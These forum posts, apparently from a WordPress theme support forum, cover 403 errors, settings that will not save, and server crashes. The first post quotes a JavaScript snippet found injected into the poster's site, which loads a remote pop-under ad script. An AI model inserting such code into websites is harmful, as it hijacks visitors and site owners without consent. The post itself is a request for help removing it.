My sites keeps showing a popup to another site, when I investigate the code – it shows the following:

//
(function() {
var configuration = {
"token": "8f1bc5aa7e697f9829c057cfd305bd64",
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//

I have also noticed other people with the same issue on the Newspaper theme:
https://stackoverflow.com/questions/44038908/how-to-determine-how-someone-is-hacking-my-wordpress-site

Here is a link to my site
https://goo.gl/iHfsxQ

Can you please advise how to fix this, I have removed all wordpress files, updated theme, removed and installed all plugins again, ran wordfence and anti-malware and its still there.

I am experiencing a 403 error and cannot save on theme options on my site http://www.commercialnewsmedia.com I’ve tried deactivating plugins and that doesn’t seem to have solved the problem. Any ideas?

Error Details: The Jetpack server was unable to communicate with your site http://www.evanino.com [HTTP 403]. Ask your web host if they allow connections from WordPress.com. If you need further assistance, contact Jetpack Support: http://jetpack.com/support/

Yes, we do get a strange error (403) in the console for the file wp-admin/admin-ajax.php:
Failed to load resource: the server responded with a status of 403 (Forbidden)
http://xxx.xxx/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=7.5

The file permission is set to 0644.

Hi,

First check the theme panel and make modifications to the parameters mentioned in this guide, if necessary. The try saving settings in the theme panel.
https://forum.tagdiv.com/system-status-parameters-guide/
Try disabling all your plugins except the ones provided in the theme package, clear any caching installed and then try again.
The 403 error means a server related issue with filters or permissions. You could contact your server administrator or hosting provider and explain the situation. Maybe they can give you some information about why the server is responding with these errors.

Thanks

Hey guys,

In the wordpress dashboard -> “Newspaper” -> “plugins”, you should be allowed to download both visual composer and tagDiv social counter, but both the “install” buttons lead to a 403 error.

Is there any alternative way for me to download both plugins?

I need Visual composer to get things running asap.

Any help would be appreciated.
Thanks

I have read many posts about individuals not being able to save their settings in the theme panel of the Newspaper theme. I have read them all – modifying and optimizing the settings for WordPress (everything is green and set to the settings advised by tagDiv), clearing our cache, installing Super Cache, and even reinstalling the theme 6 times with no results.

It should be taken note that we do not have a domain pointed to this website and are using VHost in order to work on it. We were able to have these settings work using a local MAMP install and they did in fact save. But, that is not the point, we want to work on this website while it is on our hosting account as we plan to use this WordPress install with the Newspaper theme as an update version of a website that already has the domain we will use pointed at it.

We also noted that when trying to install the packaged plugins from the Newspaper/Plugins menu items that they would not install and would throw a 403 Forbidden error up on the screen. Our host does not allow temporary URLs. But we were able to simply upload the plugins from the Newspaper download, and everything installed successfully, even Visual Composer

With the above information provided I hope someone can give us a workaround that will allow us to still work on this site without point a domain to it while under construction, and not work on it on a local machine.

Thanks!

Good afternoon,

Ninja Popups version in 4.4.1. I haven’t disable any JS Tool, as i realised that the problem has to do with HTTP version or sth like that. I might ask the help of an experience developer in order to fix it, as it is very annoying.

If you reproduce the problem and check your cpanel log files, you will see this error:

Error 188.4.49.30 403 GET /wp-admin/post-new.php?post_type=page HTTP/1.0

If you find any solution please reply here!

Thanks!

Hi,

I can see you are using WP Rocket but you may have the wrong settings.

I use this plugin also and have a good pagespeed score with it.

Try the settings that I use and see if there is a noticeable difference in page speed.

http://www.screencast.com/users/KevinGilmour3141/folders/Default/media/58ff041c-5e65-4dcf-bfb0-ba4036c8baf3

The only option you should ignore is the SSL option for your site.

Hope this helps

Hello,

My website is http://www.otakunz.co.nz/ but it’s currently in Maintenance Mode.

I’m trying to change my permalink settings from “Day and Name” to “Post Name” but when I click Save Changes I get redirected to /wp-admin/options-permalink.php which displays this https://gyazo.com/a6ff90da403e0847c185a8eb1d2f21b7

I’ve done a bit of research and I’ve tried everything. Apparently the only thing that could be preventing this is the theme.

It’d be great to have some insight onto this problem 🙂

I’m running CENTOS Apache/NGINX server config on a fresh SSD drive VPS with no other WP installs. I’m getting around 20k page views a month or so, with peak traffic around 1500 pages in a 12 hour period.

4G ram, 16 core – it’s a fast server, but having some sort of configuration issues with NEWSPAPER/WP install as well as fatal PHP errors.

WP_MEMORY_LIMIT WordPress memory limit 1000M
WP_MAX_MEMORY_LIMIT Administrative memory limit 2500M
WP_CACHE Built-in caching Enabled

Can give access to WP admin & server upon request.

Please help, site crashing constantly – every day.

Some more info:

[Fri Aug 26 23:31:44.006267 2016] [fcgid:warn] [pid 28524:tid 140309218412288] [client 209.11.120.66:34391] mod_fcgid: can’t apply process slot for /var/www/cgi-bin/cgi_wrapper/cgi_wrapper

If the ‘can’t apply process slot for’ error messages are showing in a website’s error log, this means that the FcgidMaxProcesses limit has been reached. It is not a server performance issue, but rather, an issue in communication between Apache and its module. The error means that the site on the server is using too many resources, specifically the FcgidMaxProcesses limit in apache/nginx config file

I chekced the apache error logs and found the following:

[Fri Aug 26 23:46:10.609408 2016] [core:warn] [pid 12198:tid 140309685360704] AH00045: child process 26038 still did not exit, sending a SIGTERM

I think this means the server is saying “I couldn’t stop this process normally so I’m pushing it harder by telling it to stop instead of being nice about it.” It generally happens when Apache is hanging when trying to work, and is usually caused by too many resource usages, or possibly, in this case, process limits being hit. Your server is configured to only allow a certain amount of processes to run, or have open files/process and if it hits that limit it wont do anything else until another process finishes.

Hi,

I have a problem with IOS Slider. Here I can see fine the slider in your demo:
http://demo.tagdiv.com/newspaper/ios-slider/

But in my website slides are putting one over one. You can see here (On right sidebar, just below weather block):

http://harodigital.com/inicio-pruebas/

If I check with Chrome inspector, I can see that the DIVs sorrounding the slider doesn’t have inline css as in you demo, but I have no idea why. For example:

In my web is just:

(No inline CSS)

Any answer?

Thanks

Yes; this is why we completely disable XMLRPC on our system. We had this happen a couple of times in 2012 and whacked the entire system.

we add this at bottom of .htaccess on all our sites (Apache)

<IfModule mod_alias.c>
RedirectMatch 403 /xmlrpc.php
</IfModule>

and delete this from header.php

<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />

Hi

Please make sure that the parameters from system status have the values indicated in our documentation: https://forum.tagdiv.com/system-status-parameters-guide/ Also check the browser’s console while you’re trying to save the settings. Usually there should be a 403 or 404 error in console which refers to admin-ajax.php file.
The theme make many requests to admin-ajax.php file and the security module from your server may treat it as a thread. In this situation that file is banned and the theme can’t access it anymore. Try to contact your host provider and ask him if you that file is banned or if there is any firewall on the server which may block the request.

Thanks!
